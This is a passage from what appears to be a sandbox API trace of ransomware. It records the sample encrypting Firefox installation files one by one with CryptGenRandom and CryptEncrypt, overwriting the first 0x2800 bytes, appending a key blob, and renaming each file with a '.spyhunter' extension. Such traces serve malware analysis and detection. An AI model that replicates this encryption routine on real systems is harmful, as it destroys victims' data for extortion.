liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.774] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e7a4*=0x2800, lpOverlapped=0x0) returned 1 [0162.774] GetProcessHeap () returned 0x2c0000 [0162.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.775] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.775] WriteFile (in: hFile=0x9c, lpBuffer=0x57e7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x57e7e4*, lpNumberOfBytesWritten=0x57e7a4*=0x4, lpOverlapped=0x0) returned 1 [0162.775] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e7a4*=0x30, lpOverlapped=0x0) returned 1 [0162.775] CloseHandle (hObject=0x9c) returned 1 [0162.867] GetProcessHeap () returned 0x2c0000 [0162.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.868] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll.spyhunter") returned 65 [0162.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll.spyhunter")) returned 1 [0162.869] GetProcessHeap () returned 0x2c0000 [0162.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.869] GetProcessHeap () returned 0x2c0000 [0162.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.869] GetProcessHeap () returned 0x2c0000 [0162.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1648 | out: hHeap=0x2c0000) returned 1 [0162.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7e0 | out: pbBuffer=0x57e7e0) returned 1 [0162.869] GetProcessHeap () returned 0x2c0000 [0162.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7d8*=0x30) returned 1 [0162.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.870] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe") returned 63 [0162.870] StrStrW (lpFirst="plugin-container.exe", lpSrch=".txt") returned 0x0 [0162.870] GetProcessHeap () returned 0x2c0000 [0162.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0162.870] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e79c*=0x2800, lpOverlapped=0x0) returned 1 [0162.930] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.930] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e79c*=0x2800, lpOverlapped=0x0) returned 1 [0162.930] GetProcessHeap () returned 0x2c0000 [0162.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0162.931] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.931] WriteFile (in: hFile=0x178, lpBuffer=0x57e7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x57e7dc*, lpNumberOfBytesWritten=0x57e79c*=0x4, lpOverlapped=0x0) returned 1 [0162.996] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e79c*=0x30, lpOverlapped=0x0) returned 1 [0162.997] CloseHandle (hObject=0x178) returned 1 [0163.042] GetProcessHeap () returned 0x2c0000 [0163.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0163.042] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe.spyhunter") returned 73 [0163.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe.spyhunter")) returned 1 [0163.043] GetProcessHeap () returned 0x2c0000 [0163.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0163.044] GetProcessHeap () returned 0x2c0000 [0163.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.044] GetProcessHeap () returned 0x2c0000 [0163.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5ad8 | out: hHeap=0x2c0000) returned 1 [0163.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7e0 | out: pbBuffer=0x57e7e0) returned 1 [0163.044] GetProcessHeap () returned 0x2c0000 [0163.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.044] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7d8*=0x30) returned 1 [0163.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0163.045] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll") returned 54 [0163.045] StrStrW (lpFirst="nssckbi.dll", lpSrch=".txt") returned 0x0 [0163.045] GetProcessHeap () returned 0x2c0000 [0163.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.045] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e79c*=0x2800, lpOverlapped=0x0) returned 1 [0163.108] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.109] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e79c*=0x2800, lpOverlapped=0x0) returned 1 [0163.109] GetProcessHeap () returned 0x2c0000 [0163.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.109] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.109] WriteFile (in: hFile=0x9c, lpBuffer=0x57e7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x57e7dc*, lpNumberOfBytesWritten=0x57e79c*=0x4, lpOverlapped=0x0) returned 1 [0163.389] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e79c*=0x30, lpOverlapped=0x0) returned 1 [0163.389] CloseHandle (hObject=0x9c) returned 1 [0163.476] GetProcessHeap () returned 0x2c0000 [0163.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.476] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll.spyhunter") returned 64 [0163.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll.spyhunter")) returned 1 [0163.478] GetProcessHeap () returned 0x2c0000 [0163.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.478] GetProcessHeap () returned 0x2c0000 [0163.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.478] GetProcessHeap () returned 0x2c0000 [0163.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec11f8 | out: hHeap=0x2c0000) returned 1 [0163.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7d8 | out: pbBuffer=0x57e7d8) returned 1 [0163.478] GetProcessHeap () returned 0x2c0000 [0163.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7d0*=0x30) returned 1 [0163.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.479] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe") returned 75 [0163.479] StrStrW (lpFirst="maintenanceservice_installer.exe", lpSrch=".txt") returned 0x0 [0163.479] GetProcessHeap () returned 0x2c0000 [0163.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.479] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e794*=0x2800, lpOverlapped=0x0) returned 1 [0163.533] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.533] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e794*=0x2800, lpOverlapped=0x0) returned 1 [0163.533] GetProcessHeap () returned 0x2c0000 [0163.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.533] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.533] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x57e7d4*, lpNumberOfBytesWritten=0x57e794*=0x4, lpOverlapped=0x0) returned 1 [0163.594] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e794*=0x30, lpOverlapped=0x0) returned 1 [0163.594] CloseHandle (hObject=0xb0) returned 1 [0163.594] GetProcessHeap () returned 0x2c0000 [0163.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.595] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe.spyhunter") returned 85 [0163.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe.spyhunter")) returned 1 [0163.596] GetProcessHeap () returned 0x2c0000 [0163.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.596] GetProcessHeap () returned 0x2c0000 [0163.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.596] GetProcessHeap () returned 0x2c0000 [0163.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5b30 | out: hHeap=0x2c0000) returned 1 [0163.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7d8 | out: pbBuffer=0x57e7d8) returned 1 [0163.596] GetProcessHeap () returned 0x2c0000 [0163.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7d0*=0x30) returned 1 [0163.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll") returned 56 [0163.597] StrStrW (lpFirst="libGLESv2.dll", lpSrch=".txt") returned 0x0 [0163.597] GetProcessHeap () returned 0x2c0000 [0163.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.597] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e794*=0x2800, lpOverlapped=0x0) returned 1 [0163.686] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.686] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e794*=0x2800, lpOverlapped=0x0) returned 1 [0163.687] GetProcessHeap () returned 0x2c0000 [0163.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.687] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.687] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x57e7d4*, lpNumberOfBytesWritten=0x57e794*=0x4, lpOverlapped=0x0) returned 1 [0163.719] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e794*=0x30, lpOverlapped=0x0) returned 1 [0163.719] CloseHandle (hObject=0xb0) returned 1 [0163.719] GetProcessHeap () returned 0x2c0000 [0163.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.719] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll.spyhunter") returned 66 [0163.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libGLESv2.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\libglesv2.dll.spyhunter")) returned 1 [0163.720] GetProcessHeap () returned 0x2c0000 [0163.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.720] GetProcessHeap () returned 0x2c0000 [0163.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.720] GetProcessHeap () returned 0x2c0000 [0163.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8638 | out: hHeap=0x2c0000) returned 1 [0163.721] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7d0 | out: pbBuffer=0x57e7d0) returned 1 [0163.721] GetProcessHeap () returned 0x2c0000 [0163.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7c8*=0x30) returned 1 [0163.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.721] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll") returned 53 [0163.721] StrStrW (lpFirst="libEGL.dll", lpSrch=".txt") returned 0x0 [0163.721] GetProcessHeap () returned 0x2c0000 [0163.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.722] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e78c*=0x2800, lpOverlapped=0x0) returned 1 [0163.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.746] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e78c*=0x2800, lpOverlapped=0x0) returned 1 [0163.746] GetProcessHeap () returned 0x2c0000 [0163.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.747] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.747] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x57e7cc*, lpNumberOfBytesWritten=0x57e78c*=0x4, lpOverlapped=0x0) returned 1 [0163.747] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e78c*=0x30, lpOverlapped=0x0) returned 1 [0163.747] CloseHandle (hObject=0xb0) returned 1 [0163.748] GetProcessHeap () returned 0x2c0000 [0163.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.748] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll.spyhunter") returned 63 [0163.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\libEGL.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\libegl.dll.spyhunter")) returned 1 [0163.749] GetProcessHeap () returned 0x2c0000 [0163.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.749] GetProcessHeap () returned 0x2c0000 [0163.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.749] GetProcessHeap () returned 0x2c0000 [0163.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0da8 | out: hHeap=0x2c0000) returned 1 [0163.749] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7d0 | out: pbBuffer=0x57e7d0) returned 1 [0163.749] GetProcessHeap () returned 0x2c0000 [0163.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0163.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e7c8*=0x30) returned 1 [0163.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0163.751] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\install.log") returned 54 [0163.751] StrStrW (lpFirst="install.log", lpSrch=".txt") returned 0x0 [0163.751] GetProcessHeap () returned 0x2c0000 [0163.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.751] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e78c*=0x2800, lpOverlapped=0x0) returned 1 [0163.757] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.757] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e78c*=0x2800, lpOverlapped=0x0) returned 1 [0163.758] GetProcessHeap () returned 0x2c0000 [0163.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.758] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.758] WriteFile (in: hFile=0xb0, lpBuffer=0x57e7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x57e7cc*, lpNumberOfBytesWritten=0x57e78c*=0x4, lpOverlapped=0x0) returned 1 [0163.833] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e78c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x57e78c*=0x30, lpOverlapped=0x0) returned 1 [0163.833] CloseHandle (hObject=0xb0) returned 1 [0163.833] GetProcessHeap () returned 0x2c0000 [0163.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.833] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\install.log.spyhunter") returned 64 [0163.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\install.log.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log.spyhunter")) returned 1 [0163.837] GetProcessHeap () returned 0x2c0000 [0163.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.837] GetProcessHeap () returned 0x2c0000 [0163.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0163.838] GetProcessHeap () returned 0x2c0000 [0163.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0c38 | out: hHeap=0x2c0000) returned 1 [0163.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e7c8 | out: 